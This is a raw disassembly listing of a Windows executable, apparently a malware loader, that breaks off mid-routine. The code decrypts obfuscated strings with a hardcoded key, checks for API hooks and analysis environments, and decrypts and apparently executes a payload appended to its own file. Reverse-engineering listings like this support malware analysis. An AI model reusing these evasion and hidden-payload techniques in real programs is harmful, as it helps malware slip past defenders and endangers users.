loc_401C36: ; CODE XREF: sub_401910+1BD�j
; sub_401910+1CB�j ...
push edi ; hLibModule
call ds:FreeLibrary ; FreeLibrary
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn
sub_401910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C50 proc near ; CODE XREF: sub_402850+35�p
push esi
push edi
push 9
push offset ModuleName ; "Vs"
push offset aX0ffka1pix ; "X0FFKa1pix"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset aSle ; "Se"
mov eax, ecx
mov esi, edi
mov edi, offset ModuleName ; "Vs"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset aYka ; "Ya"
mov edx, ecx
mov esi, edi
mov edi, offset aSle ; "Se"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset ProcName ; "ne\n"
mov eax, ecx
mov esi, edi
mov edi, offset aYka ; "Ya"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset aNzeB ; "ne\n"
mov edx, ecx
mov esi, edi
mov edi, offset ProcName ; "ne\n"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push 12h
mov eax, ecx
mov esi, edi
mov edi, offset aNzeB ; "ne\n"
push offset dword_404050
shr ecx, 2
rep movsd
mov ecx, eax
push offset aX0ffka1pix ; "X0FFKa1pix"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 14h
mov edx, ecx
mov esi, edi
mov edi, offset dword_404050
push offset aBB ; "bB"
shr ecx, 2
rep movsd
mov ecx, edx
push offset aX0ffka1pix ; "X0FFKa1pix"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset aR ; "~r\x1B"
mov eax, ecx
mov esi, edi
mov edi, offset aBB ; "bB"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset aR_0 ; "{r"
mov edx, ecx
mov esi, edi
mov edi, offset aR ; "~r\x1B"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, offset aR_0 ; "{r"
shr ecx, 2
rep movsd
mov ecx, eax
push 10h
and ecx, 3
push offset dword_404098
rep movsb
push offset aX0ffka1pix ; "X0FFKa1pix"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 11h
repne scasb
not ecx
sub edi, ecx
push offset aJlv ; "jv"
mov edx, ecx
mov esi, edi
mov edi, offset dword_404098
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset aNzeB_0 ; "ne\n"
mov eax, ecx
mov esi, edi
mov edi, offset aJlv ; "jv"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 10h
mov edx, ecx
mov esi, edi
mov edi, offset aNzeB_0 ; "ne\n"
push offset aNzeB_1 ; "ne\n"
shr ecx, 2
rep movsd
mov ecx, edx
push offset aX0ffka1pix ; "X0FFKa1pix"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 12h
repne scasb
not ecx
sub edi, ecx
push offset aOSAEg ; "o~\n-a&EG"
mov eax, ecx
mov esi, edi
mov edi, offset aNzeB_1 ; "ne\n"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push 10h
mov edx, ecx
mov esi, edi
mov edi, offset aOSAEg ; "o~\n-a&EG"
push offset aKlc ; "kc*"
shr ecx, 2
rep movsd
mov ecx, edx
push offset aX0ffka1pix ; "X0FFKa1pix"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset aJldS ; "jd\v"
mov eax, ecx
mov esi, edi
mov edi, offset aKlc ; "kc*"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset aVxS5Lq ; "{x\r5`!LQ"
mov edx, ecx
mov esi, edi
mov edi, offset aJldS ; "jd\v"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 10h
repne scasb
not ecx
sub edi, ecx
push offset aLle ; "le"
mov eax, ecx
mov esi, edi
mov edi, offset aVxS5Lq ; "{x\r5`!LQ"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edx, ecx
mov edi, offset aLle ; "le"
shr ecx, 2
rep movsd
mov ecx, edx
push 0Bh
and ecx, 3
push offset aNzeB_2 ; "ne\n"
rep movsb
push offset aX0ffka1pix ; "X0FFKa1pix"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset aKlc2i ; "kc2"
mov eax, ecx
mov esi, edi
mov edi, offset aNzeB_2 ; "ne\n"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset dword_404160
mov edx, ecx
mov esi, edi
mov edi, offset aKlc2i ; "kc2"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 5
repne scasb
not ecx
sub edi, ecx
push offset aKvrD ; "kr\x1B"
mov eax, ecx
mov esi, edi
mov edi, offset dword_404160
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 11h
repne scasb
not ecx
sub edi, ecx
push offset aJI ; "j{="
mov edx, ecx
mov esi, edi
mov edi, offset aKvrD ; "kr\x1B"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 13h
repne scasb
not ecx
sub edi, ecx
push offset aJS ; "j{:"
mov eax, ecx
mov esi, edi
mov edi, offset aJI ; "j{="
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 1Eh
mov edx, ecx
mov esi, edi
mov edi, offset aJS ; "j{:"
push offset aJ9s ; "j{9\t"
shr ecx, 2
rep movsd
mov ecx, edx
push offset aX0ffka1pix ; "X0FFKa1pix"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset aR_1 ; "{r"
mov eax, ecx
mov esi, edi
mov edi, offset aJ9s ; "j{9\t"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 8
repne scasb
not ecx
sub edi, ecx
push offset aJlv_0 ; "jv"
mov edx, ecx
mov esi, edi
mov edi, offset aR_1 ; "{r"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, offset aJlv_0 ; "jv"
push 0Dh
shr ecx, 2
rep movsd
mov ecx, eax
push offset dword_4041D0
and ecx, 3
push offset aX0ffka1pix ; "X0FFKa1pix"
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset aKlc8a ; "kc8"
mov edx, ecx
mov esi, edi
mov edi, offset dword_4041D0
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset dword_404200
mov eax, ecx
mov esi, edi
mov edi, offset aKlc8a ; "kc8"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 0Bh
mov edx, ecx
mov esi, edi
mov edi, offset dword_404200
push offset aJlp1d ; "jp1"
shr ecx, 2
rep movsd
mov ecx, edx
push offset aX0ffka1pix ; "X0FFKa1pix"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 10h
repne scasb
not ecx
sub edi, ecx
push offset aJlpB ; "jp/"
mov eax, ecx
mov esi, edi
mov edi, offset aJlp1d ; "jp1"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push offset aX0ffka1pix ; "X0FFKa1pix"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset aJlpS ; "jp="
mov edx, ecx
mov esi, edi
mov edi, offset aJlpB ; "jp/"
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset dword_40423C
mov eax, ecx
mov esi, edi
mov edi, offset aJlpS ; "jp="
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 7
repne scasb
not ecx
sub edi, ecx
push offset dword_404248
mov edx, ecx
mov esi, edi
mov edi, offset dword_40423C
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 6
repne scasb
not ecx
sub edi, ecx
push offset dword_404250
mov eax, ecx
mov esi, edi
mov edi, offset dword_404248
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
mov edx, ecx
mov esi, edi
mov edi, offset dword_404250
push 13h
shr ecx, 2
rep movsd
mov ecx, edx
push offset dword_404258
and ecx, 3
push offset aX0ffka1pix ; "X0FFKa1pix"
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 10h
repne scasb
not ecx
sub edi, ecx
push offset dword_40426C
mov eax, ecx
mov esi, edi
mov edi, offset dword_404258
push offset aX0ffka1pix ; "X0FFKa1pix"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 18h
repne scasb
not ecx
sub edi, ecx
mov edx, ecx
mov esi, edi
mov edi, offset dword_40426C
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
retn
sub_401C50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402400 proc near ; CODE XREF: sub_4026F0+86�p
; sub_4026F0+A5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_4]
push esi
push edi
cmp byte ptr [ebp+0], 0
jnz short loc_402415
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_402400+B�j
mov edi, [esp+0Ch+arg_0]
cmp byte ptr [edi], 0
jz short loc_40243A
loc_40241E: ; CODE XREF: sub_402400+38�j
mov esi, edi
mov ecx, ebp
sub esi, ebp
loc_402424: ; CODE XREF: sub_402400+30�j
mov dl, [ecx]
test dl, dl
jz short loc_402440
mov al, [esi+ecx]
inc ecx
cmp al, dl
jz short loc_402424
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40241E
loc_40243A: ; CODE XREF: sub_402400+1C�j
pop edi
pop esi
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_402440: ; CODE XREF: sub_402400+28�j
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_402400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402450 proc near ; CODE XREF: sub_4012C0+BF�p
; sub_4012C0+12C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
push edi
cmp esi, eax
mov ecx, eax
jnb short loc_40247D
mov ecx, [esp+8+arg_8]
test ecx, ecx
lea edx, [esi+ecx]
lea esi, [eax+ecx]
jz short loc_402492
mov edi, ecx
loc_402470: ; CODE XREF: sub_402450+28�j
mov cl, [edx-1]
dec edx
dec esi
dec edi
mov [esi], cl
jnz short loc_402470
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40247D: ; CODE XREF: sub_402450+E�j
jz short loc_402492
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_402492
sub esi, eax
loc_402489: ; CODE XREF: sub_402450+40�j
mov dl, [esi+ecx]
mov [ecx], dl
inc ecx
dec edi
jnz short loc_402489
loc_402492: ; CODE XREF: sub_402450+1C�j
; sub_402450:loc_40247D�j ...
pop edi
pop esi
retn
sub_402450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4024A0 proc near ; CODE XREF: sub_402850:loc_4028CA�p
mov eax, dword_40431C
mov al, [eax]
cmp al, 0E8h
jz loc_4025B4
cmp al, 0E9h
jz loc_4025B4
mov eax, dword_4042FC
mov al, [eax]
cmp al, 0E8h
jz loc_4025B4
cmp al, 0E9h
jz loc_4025B4
mov eax, dword_4042D0
mov al, [eax]
cmp al, 0E8h
jz loc_4025B4
cmp al, 0E9h
jz loc_4025B4
mov eax, dword_4042D4
mov al, [eax]
cmp al, 0E8h
jz loc_4025B4
cmp al, 0E9h
jz loc_4025B4
mov eax, dword_4042E4
mov al, [eax]
cmp al, 0E8h
jz loc_4025B4
cmp al, 0E9h
jz loc_4025B4
mov eax, dword_4042C8
mov al, [eax]
cmp al, 0E8h
jz loc_4025B4
cmp al, 0E9h
jz loc_4025B4
mov eax, dword_4042E8
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_4042F0
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_4042F8
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_404320
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_404314
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_40430C
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_4042CC
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_404330
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
mov eax, dword_4042F4
mov al, [eax]
cmp al, 0E8h
jz short loc_4025B4
cmp al, 0E9h
jz short loc_4025B4
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4025B4: ; CODE XREF: sub_4024A0+9�j
; sub_4024A0+11�j ...
mov eax, 1
retn
sub_4024A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025C0 proc near ; CODE XREF: sub_402850+B0�p
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 8
push ebx
push esi
push edi
push 0 ; lpModuleName
xor bl, bl
call ds:GetModuleHandleA ; GetModuleHandleA
mov ecx, [eax+3Ch]
push eax ; hObject
lea edx, [ecx+eax+4]
xor ecx, ecx
mov cx, [edx+10h]
lea esi, [ecx+edx+14h]
xor ecx, ecx
mov cx, [edx+2]
lea edx, [ecx+ecx*4]
lea ecx, [esi+edx*8]
mov esi, [esi+edx*8-18h]
mov edx, [ecx-14h]
add esi, edx
call ds:CloseHandle ; CloseHandle
push 0 ; dwErrCode
call ds:SetLastError
mov eax, [esp+14h+arg_0]
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push eax
call dword_404300
mov edi, eax
call ds:GetLastError
test eax, eax
jnz short loc_402697
cmp edi, 0FFFFFFFFh
jz short loc_402697
lea ecx, [esp+14h+var_8]
push ecx
push edi
call dword_404308
mov eax, [esp+14h+var_8]
cmp eax, esi
jbe short loc_402687
sub eax, esi
push ebp
mov ebx, eax
push 1
lea edx, [ebx+1]
push edx
call sub_401000
add esp, 8
mov ebp, eax
push 0
push 0
push esi
push edi
call dword_404334
lea eax, [esp+18h+var_4]
push 0
push eax
push ebx
push ebp
push edi
call dword_4042EC
mov ecx, [esp+18h+arg_4]
mov edx, [esp+18h+arg_8]
mov [ecx], ebp
mov [edx], ebx
mov bl, 1
pop ebp
loc_402687: ; CODE XREF: sub_4025C0+85�j
push edi ; hObject
call ds:CloseHandle ; CloseHandle
pop edi
mov al, bl
pop esi
pop ebx
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_402697: ; CODE XREF: sub_4025C0+6C�j
; sub_4025C0+71�j
pop edi
pop esi
xor al, al
pop ebx
add esp, 8
retn
sub_4025C0 endp
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: sub_4026F0+7D�p
; sub_4026F0+9C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push edi
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push 1
mov edi, ecx
lea eax, [edi+1]
push eax
call sub_401000
add esp, 8
test edi, edi
jle short loc_4026E4
push esi
mov esi, eax
mov edx, ebx
sub esi, ebx
loc_4026CD: ; CODE XREF: sub_4026A0+41�j
mov cl, [edx]
cmp cl, 41h
jl short loc_4026DC
cmp cl, 5Ah
jg short loc_4026DC
add cl, 20h
loc_4026DC: ; CODE XREF: sub_4026A0+32�j
; sub_4026A0+37�j
mov [esi+edx], cl
inc edx
dec edi
jnz short loc_4026CD
pop esi
loc_4026E4: ; CODE XREF: sub_4026A0+24�j
pop edi
pop ebx
retn
sub_4026A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026F0 proc near ; CODE XREF: sub_402850:loc_4028B5�p
var_10C = byte ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
sub esp, 108h
push ebx
push esi
push edi
mov ecx, 40h
xor eax, eax
lea edi, [esp+114h+var_103]
mov [esp+114h+var_104], 0
mov [esp+114h+var_108], 104h
rep stosd
stosw
stosb
lea eax, [esp+114h+var_108]
lea ecx, [esp+114h+var_104]
push eax
push ecx
call dword_404324
mov esi, offset dword_40423C
lea eax, [esp+11Ch+var_10C]
loc_40272F: ; CODE XREF: sub_4026F0+61�j
mov dl, [eax]
mov bl, [esi]
mov cl, dl
cmp dl, bl
jnz short loc_402757
test cl, cl
jz short loc_402753
mov dl, [eax+1]
mov bl, [esi+1]
mov cl, dl
cmp dl, bl
jnz short loc_402757
add eax, 2
add esi, 2
test cl, cl
jnz short loc_40272F
loc_402753: ; CODE XREF: sub_4026F0+4B�j
xor eax, eax
jmp short loc_40275C
; ---------------------------------------------------------------------------
loc_402757: ; CODE XREF: sub_4026F0+47�j
; sub_4026F0+57�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40275C: ; CODE XREF: sub_4026F0+65�j
pop edi
pop esi
test eax, eax
pop ebx
jz short loc_4027AA
lea eax, [esp+110h+var_10C]
push offset dword_404248
push eax
call sub_4026A0
add esp, 4
push eax
call sub_402400
add esp, 8
test eax, eax
jnz short loc_4027AA
lea ecx, [esp+110h+var_10C]
push offset dword_404250
push ecx
call sub_4026A0
add esp, 4
push eax
call sub_402400
add esp, 8
test eax, eax
jnz short loc_4027AA
xor al, al
add esp, 108h
retn
; ---------------------------------------------------------------------------
loc_4027AA: ; CODE XREF: sub_4026F0+71�j
; sub_4026F0+90�j ...
mov al, 1
add esp, 108h
retn
sub_4026F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027C0 proc near ; CODE XREF: sub_402850:loc_4028A0�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
sub esp, 2Ch
push ebx
push edi
mov ecx, 7
xor eax, eax
lea edi, [esp+34h+var_1F]
mov [esp+34h+var_20], 0
rep stosd
stosw
stosb
lea eax, [esp+34h+var_2C]
mov ebx, 1
push eax
push offset dword_404258
push 80000001h
mov [esp+40h+var_28], 1Fh
mov [esp+40h+var_24], ebx
call dword_404318
test eax, eax
jnz short loc_40283D
lea ecx, [esp+34h+var_28]
lea edx, [esp+34h+var_20]
push ecx
mov ecx, [esp+38h+var_2C]
lea eax, [esp+38h+var_24]
push edx
push eax
push 0
push offset dword_40426C
push ecx
call dword_4042E0
test eax, eax
jnz short loc_402832
cmp [esp+34h+var_20], 30h
jnz short loc_402832
xor bl, bl
loc_402832: ; CODE XREF: sub_4027C0+67�j
; sub_4027C0+6E�j
mov edx, [esp+34h+var_2C]
push edx
call dword_404328
loc_40283D: ; CODE XREF: sub_4027C0+42�j
mov al, bl
pop edi
pop ebx
add esp, 2Ch
retn
sub_4027C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402850 proc near ; CODE XREF: start+7D�p
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 114h
push ebx
push esi
push edi
jmp short loc_402865
; ---------------------------------------------------------------------------
xor eax, eax
jmp loc_402967
; ---------------------------------------------------------------------------
loc_402865: ; CODE XREF: sub_402850+C�j
mov [ebp+var_10C], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_10B]
rep stosd
stosw
stosb
mov [ebp+var_8], 0
call sub_401C50
call sub_401910
and eax, 0FFh
test eax, eax
jnz short loc_4028A0
or eax, 0FFFFFFFFh
jmp loc_402967
; ---------------------------------------------------------------------------
loc_4028A0: ; CODE XREF: sub_402850+46�j
call sub_4027C0
and eax, 0FFh
test eax, eax
jz short loc_4028B5
xor eax, eax
jmp loc_402967
; ---------------------------------------------------------------------------
loc_4028B5: ; CODE XREF: sub_402850+5C�j
call sub_4026F0
and eax, 0FFh
test eax, eax
jz short loc_4028CA
xor eax, eax
jmp loc_402967
; ---------------------------------------------------------------------------
loc_4028CA: ; CODE XREF: sub_402850+71�j
call sub_4024A0
test eax, eax
jz short loc_4028DA
xor eax, eax
jmp loc_402967
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402850+81�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call dword_4042FC
lea ecx, [ebp+var_114]
push ecx
lea edx, [ebp+var_4]
push edx
lea eax, [ebp+var_10C]
push eax
call sub_4025C0
add esp, 0Ch
and eax, 0FFh
test eax, eax
jz short loc_402965
mov ecx, [ebp+var_114]
push ecx
mov edx, [ebp+var_4]
push edx
push offset aX0ffka1pix ; "X0FFKa1pix"
call sub_401040
add esp, 0Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_110]
push eax
mov ecx, [ebp+var_114]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_401190
add esp, 0Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
push eax
push offset dword_40433C
mov ecx, [ebp+var_110]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_401890
add esp, 10h
loc_402965: ; CODE XREF: sub_402850+BF�j
xor eax, eax
loc_402967: ; CODE XREF: sub_402850+10�j
; sub_402850+4B�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_402850 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
public start
start proc near
StartupInfo = _STARTUPINFOA ptr -44h
push ebp
mov ebp, esp
sub esp, 44h
push esi
call ds:GetCommandLineA ; GetCommandLineA
mov esi, eax
mov al, [esi]
cmp al, 22h
jnz short loc_402999
loc_402985: ; CODE XREF: start+1F�j
mov al, [esi+1]
inc esi
test al, al
jz short loc_402991
cmp al, 22h
jnz short loc_402985
loc_402991: ; CODE XREF: start+1B�j
cmp byte ptr [esi], 22h
jnz short loc_4029A3
loc_402996: ; CODE XREF: start+3B�j
inc esi
jmp short loc_4029A3
; ---------------------------------------------------------------------------
loc_402999: ; CODE XREF: start+13�j
cmp al, 20h
jle short loc_4029A3
loc_40299D: ; CODE XREF: start+31�j
inc esi
cmp byte ptr [esi], 20h
jg short loc_40299D
loc_4029A3: ; CODE XREF: start+24�j start+27�j ...
mov al, [esi]
test al, al
jz short loc_4029AD
cmp al, 20h
jle short loc_402996
loc_4029AD: ; CODE XREF: start+37�j
and [ebp+StartupInfo.dwFlags], 0
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
call ds:GetStartupInfoA ; GetStartupInfoA
call sub_402A1D
push offset dword_404004
push offset dword_404000
call sub_402A03
test byte ptr [ebp+StartupInfo.dwFlags], 1
pop ecx
pop ecx
jz short loc_4029DD
movzx eax, [ebp+StartupInfo.wShowWindow]
jmp short loc_4029E0
; ---------------------------------------------------------------------------
loc_4029DD: ; CODE XREF: start+65�j
push 0Ah
pop eax
loc_4029E0: ; CODE XREF: start+6B�j
push eax
push esi
push 0
push 0 ; lpModuleName
call ds:GetModuleHandleA ; GetModuleHandleA
push eax
call sub_402850
mov esi, eax
call sub_402A35
push esi ; uExitCode
call ds:ExitProcess ; ExitProcess
start endp
; ---------------------------------------------------------------------------
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_402A03 proc near ; CODE XREF: start+5A�p sub_402A35+14�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402A08: ; CODE XREF: sub_402A03+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402A1B
mov eax, [esi]
test eax, eax
jz short loc_402A16
call eax
loc_402A16: ; CODE XREF: sub_402A03+F�j
